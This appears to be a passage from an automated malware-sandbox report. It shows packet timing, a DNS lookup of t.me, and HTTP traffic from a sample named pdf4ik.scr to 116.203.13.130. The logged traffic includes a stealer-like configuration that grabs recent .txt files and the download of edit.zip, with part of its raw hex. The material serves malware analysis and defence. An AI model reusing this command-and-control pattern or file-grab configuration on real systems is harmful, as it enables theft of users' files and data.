                                      Mar 18, 2023 21:39:15.417069912 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417078972 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417110920 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417124033 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417152882 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417169094 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417193890 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417196989 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417232037 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417254925 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417273045 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417277098 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417314053 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417320967 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417352915 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417382002 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417397022 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417409897 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417438030 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417447090 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417476892 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417501926 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417517900 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417536020 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417558908 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417598963 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417598963 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417623043 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417642117 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417650938 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417681932 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417700052 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417722940 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417762995 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417781115 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417803049 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417805910 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417805910 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417843103 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417865992 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417881966 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417885065 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417922020 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417928934 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417963982 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417965889 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418003082 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418008089 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418042898 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418056011 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418083906 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418093920 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418123960 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418143034 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418164968 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418169975 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418204069 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418225050 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418247938 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418255091 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418287992 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418313026 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418325901 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418329954 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418366909 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418392897 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418409109 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418411970 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418461084 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418472052 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418512106 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418519020 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418551922 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418555021 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418591976 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418598890 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418632030 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418638945 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418670893 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418683052 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418710947 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418716908 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418751001 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418776989 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418791056 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418797970 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418831110 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418845892 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418870926 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418875933 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418909073 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418926954 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418947935 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418951988 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418987989 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418998003 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419028044 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419049978 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419066906 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419068098 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419106007 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419116974 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419145107 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419157982 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419187069 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419194937 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419226885 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419231892 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419265032 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419287920 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419305086 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419306040 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419343948 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419362068 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419384956 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419392109 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419423103 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419440985 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419461966 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419469118 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419501066 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419527054 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419539928 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419544935 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419579983 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419586897 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419620991 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419634104 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419660091 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419668913 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419698954 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419706106 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419739008 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419763088 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419778109 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419789076 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419817924 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419845104 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419857025 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419868946 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419897079 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419914007 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419936895 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419939041 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419976950 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419987917 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420016050 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420026064 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420056105 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420064926 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420094967 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420114040 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420135021 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420145035 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420173883 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420186043 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420213938 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420221090 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420253992 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420269012 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420294046 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420301914 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420332909 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420342922 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420372963 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420387030 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420454025 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.421788931 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.421852112 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.681979895 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.682092905 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.937935114 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.938030005 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:16.441968918 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:16.446513891 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:17.304658890 CET8049705192.229.221.95192.168.2.3
                                      Mar 18, 2023 21:39:17.304827929 CET4970580192.168.2.3192.229.221.95
                                      Mar 18, 2023 21:39:17.401913881 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:17.402081966 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:19.289956093 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:19.290123940 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:19.614484072 CET4971980192.168.2.3192.229.221.95
                                      Mar 18, 2023 21:39:19.633569002 CET8049719192.229.221.95192.168.2.3
                                      Mar 18, 2023 21:39:19.633687019 CET4971980192.168.2.3192.229.221.95
                                      Mar 18, 2023 21:39:23.130028009 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:23.132065058 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:25.305980921 CET4973380192.168.2.3116.203.13.130

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 18, 2023 21:39:14.341969967 CET5023653192.168.2.31.1.1.1
                                      Mar 18, 2023 21:39:14.359675884 CET53502361.1.1.1192.168.2.3

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Mar 18, 2023 21:39:14.341969967 CET192.168.2.31.1.1.10xff85Standard query (0)t.meA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Mar 18, 2023 21:39:14.359675884 CET1.1.1.1192.168.2.30xff85No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • t.me
                                      • 116.203.13.130

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.349732149.154.167.99443C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr
                                      TimestampkBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.349733116.203.13.13080C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr
                                      TimestampkBytes transferredDirectionData
                                      Mar 18, 2023 21:39:14.896399021 CET280OUTGET / HTTP/1.1
                                      X-Id: 14ac9d852bc10b98f94de36f839b2f59
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37
                                      Host: 116.203.13.130
                                      Mar 18, 2023 21:39:15.269294024 CET281INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Sat, 18 Mar 2023 20:39:15 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 35 66 0d 0a 31 2c 31 2c 31 2c 31 2c 31 2c 31 38 38 36 38 63 62 63 64 31 37 36 61 65 61 33 33 63 31 66 32 64 38 34 65 38 39 38 31 30 36 62 2c 31 2c 31 2c 31 2c 31 2c 30 2c 44 65 66 61 75 6c 74 3b 25 52 45 43 45 4e 54 25 5c 3b 2a 2e 74 78 74 3b 35 30 3b 74 72 75 65 3b 2a 77 69 6e 64 6f 77 73 2a 3b 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 5f1,1,1,1,1,18868cbcd176aea33c1f2d84e898106b,1,1,1,1,0,Default;%RECENT%\;*.txt;50;true;*windows*;0
                                      Mar 18, 2023 21:39:15.273113966 CET281OUTGET /edit.zip HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37
                                      Host: 116.203.13.130
                                      Cache-Control: no-cache
                                      Mar 18, 2023 21:39:15.294917107 CET282INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Sat, 18 Mar 2023 20:39:15 GMT
                                      Content-Type: application/zip
                                      Content-Length: 2685679
                                      Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
                                      Connection: keep-alive
                                      ETag: "631f30d3-28faef"
                                      Accept-Ranges: bytes
                                      Data Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf 7a e5 97 8c 8f 74 79 60 f1 f6 bb c5 c5 15 24 7f 72 7e f6 12 97 57 28 6b 88 b8 c6 12 d9 90 58 a1 45 72 e0 62 59 83 f0 06 da d1 81 a7 e0 4c b7 3d ee f9 0c 53 7e f6 4a f8 4d 87 df 1c f8 4d 83 df fb e0 d7 08 bf ab e0 d7 00 bf b9 f0 ab 87 df 2f c0 af 0e 7e ef 37 6d c9 7e 00 8e 4d c2 18 d4 e6 6a 82 0a 05 d7 98 20 56 2c 83 3a a0 e5 ba 71 6a 7a de 4e a3 07 5e 2e 86 9f 0d d9 79 8f 15
                                      Data Ascii: PK$V%U+m\9|Pufreebl3.dll\T7>aw(4!)UHhM:H15Nbu&Fv3-d uZnu]})JaP$f(l;@*Rwy@R/D}4N3<o/['5'uJX;]Oyg-2w;d?Z?5bFVHjZ ,B#plVicHT~5VKF?E5%F~h:_?}^s,z|M0w~io)2(ZLf=UFs6uhGyw44xcwLo2f=w=C'UE7zKO?7J}ssj?l;y/k\gul%\qyEWo#75il{dGLmFj9,26d<,kSoMe+2rqfg<!M9DI6&&Qz'\w(drb F#b>5<7@n(%b<:y(P5w MO!}Liz]=pdav\lm2O'LRg5g@#7]Ix_4>CM1#4ba<tp$;*.8dw8N_TP}Lvc'bymu0z6I^#+iQ5(zty`$r~W(kXErbYL=S~JMM/~7m~Mj V,:qjzN^.y
                                      Mar 18, 2023 21:39:15.294969082 CET284INData Raw: 47 4a b3 f3 58 6b 68 f4 db d8 83 e9 ac 1e f8 55 f9 30 48 2e bc 01 0f c3 2b ba a9 8a cb 40 75 e5 97 e0 22 56 35 05 0f ac e5 c7 fa 29 af c3 8e e4 c0 ef 76 24 0f 7e 5f 40 72 f1 99 03 bc 29 e9 3a 01 5a 97 8e 8d 4a c3 56 67 a8 4c 8a 63 9a 61 06 53 89
                                      Data Ascii: GJXkhU0H.+@u"V5)v$~_@r):ZJVgLcaSNE"^}m~0f~8WHcuME"K|$vv2>L6&f`oSER~^/K:%/%&MC6zI?:b ='3pl%MQqL
                                      Mar 18, 2023 21:39:15.295017004 CET285INData Raw: 39 8d a5 f7 3d b6 b1 38 94 09 bd 30 f0 59 52 d1 81 fb 5e 47 bd 86 67 d6 87 f6 68 e2 54 17 9f 76 18 4a 00 6e 86 fe 4d a3 a8 68 10 f5 b2 a4 38 b4 45 13 27 43 ff 38 95 04 da ed 3a 9b 4d 32 c4 e5 87 03 ce fb 00 70 ca 8b 00 ec 66 cb 05 3a b9 c8 10 f9
                                      Data Ascii: 9=80YR^GghTvJnMh8E'C8:M2pf:lqPiwGyGK$yMX!FYiP`l6r]b c\8[z>UU}XXl#=x~>;JkWHE4tG&n
                                      Mar 18, 2023 21:39:15.295068026 CET286INData Raw: 86 fe 8e 3f 47 2f 6d 0c 3d 4b 67 fa fe f3 c8 d2 33 d3 59 ca 4e 0e c2 f9 c6 50 1b 3d 63 f8 29 de 88 37 f7 79 d0 67 06 60 b1 7e 53 a8 86 3f 22 8c 2e 1d c9 19 79 21 54 42 17 bf 35 3a 8d c5 54 da 74 2e ff 17 f1 97 8d 72 5e fe ea 5d 04 6f e5 67 f5 2a
                                      Data Ascii: ?G/m=Kg3YNP=c)7yg`~S?".y!TB5:Tt.r^]og*/1>`Sjcuj,C!KZNxYV]X }a'bXa(Y9%\}2rfCh~7V3-IW4bS$:Xg3?Mtugi4MX?uy([))AF
                                      Mar 18, 2023 21:39:15.295114040 CET288INData Raw: 4f be 36 81 5d 81 87 d5 27 bb d1 b0 ac 58 8c 86 65 45 12 99 95 74 7a 05 8c 1b bc 05 c2 a0 d7 c2 8b b6 90 30 ec aa 07 b7 75 41 76 c0 f5 8c 5b 35 dd 50 09 be 9a 4b 36 29 f7 36 34 86 19 cb 35 57 c5 ba 2e 7a 64 c5 ad be 6b c6 e4 46 4e a2 10 70 79 75
                                      Data Ascii: O6]'XeEtz0uAv[5PK6)645W.zdkFNpyuH!0GU'eGfR,W{Ps%##B=kda5sju,}bWdY M"<H[>mb%Tpbdy}D?f}8|](+m,tP/txYCA
                                      Mar 18, 2023 21:39:15.295161009 CET289INData Raw: cc 93 8e 07 8e 13 42 ab 5c 94 cf 3c 2b 54 7d 94 cf 90 10 4e 31 c7 89 54 db 61 e9 22 b3 1f 64 17 65 6a 27 34 a2 92 57 38 a8 b5 1e 04 44 00 1e 25 05 b8 d3 0b 0a e2 38 2c 75 b2 71 b1 7a 48 8f 7a cf 86 95 8a 76 15 b1 93 2b f1 c0 79 02 2c d0 ae b5 ec
                                      Data Ascii: B\<+T}N1Ta"dej'4W8D%8,uqzHzv+y,dAb~$EQ$V5#`AsMn|`]buU[;VO BQ@>~I";IP1(Y.t\<%Zk3g|yt3d"v~-CblIi
                                      Mar 18, 2023 21:39:15.295207977 CET291INData Raw: 9b db d8 43 9b 39 c1 47 f7 72 67 48 7a 0b 5a 6b 09 22 de 0e 4a 6d 52 63 9c bd c2 22 fb 88 d8 be d4 33 08 60 05 e8 dc 00 41 24 10 e9 66 d6 2e 56 a3 8d aa 11 6b c0 62 51 d1 68 4d bb d0 9a da 82 29 20 71 41 29 30 dd 9a 32 9b 5b b6 9e 50 f9 ea e7 7c
                                      Data Ascii: C9GrgHzZk"JmRc"3`A$f.VkbQhM) qA)02[P|r|iNxVEFHSFrSOP~yL):)=,L("0rkz}JG4(Tj*4qa9H020!:l;'Q%pR&ShbTZcL
                                      Mar 18, 2023 21:39:15.295258045 CET292INData Raw: 85 bb 15 cc 18 74 f0 e2 50 53 a5 4e 85 5e db 71 22 96 aa 50 0b 46 1b 7c 5a 9a e4 06 fb 12 ef ff 83 9c e6 23 84 04 d6 46 14 24 40 81 a0 b5 96 60 eb e6 28 6c b5 bb a5 06 c5 0f b4 a2 81 0d d2 08 8f 17 f3 b3 5e 36 44 bd 0f 0a 1e e6 b0 75 94 87 58 04
                                      Data Ascii: tPSN^q"PF|Z#F$@`(l^6DuX\lTJ.:1AXjA9rYuyfV ^),AU;X+-0l#ijA@\)R<S"8ZuCe9kdyv2{JUd.vH<gWX4Vi|.48MpPMF
